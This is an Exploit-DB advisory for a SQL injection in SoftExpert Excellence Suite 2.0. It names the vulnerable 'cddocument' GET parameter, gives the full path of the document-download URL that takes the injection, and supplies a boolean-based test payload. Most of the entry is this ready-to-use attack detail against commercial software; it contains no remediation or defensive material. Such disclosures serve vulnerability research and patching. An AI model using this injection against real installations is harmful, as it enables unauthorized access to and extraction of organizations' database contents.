SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection

EDB-ID:

44981

CVE:

N/A




Platform:

PHP

Date:

2018-07-05


# Exploit Title: SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection
# Author: Seren PORSUK
# Date: 2018-06-28
# Type: webapps
# Platform: PHP
# CVE= N/A
# Vendor Homepage : https://www.softexpert.com/solucao/softexpert-excellence-suite/

# DETAILS
# A SQL injection vulnerability in the SoftExpert (SE) Excellence Suite 2.0
# allows remote authenticated users to perform SQL heuristics by pulling
# information from the database with the "cddocument" parameter  in the
# "Downloading Electronic Documents" section.

# Vulnerable Parameter Type : GET
# Vulnerable Parameter : cddocument

#Vulnerable URL : 
http://localhost/se/v75408/generic/gn_eletronicfile_view/1.1/view_eletronic_download.php?class_name=dc_eletronic_file&classwaybusinessrule=class.dc_eletronic_file.inc&action=4&cddocument=[SQLi]&saveas1&mainframe=1&cduser=6853

#SQLi Parameter : 2  AND 1=2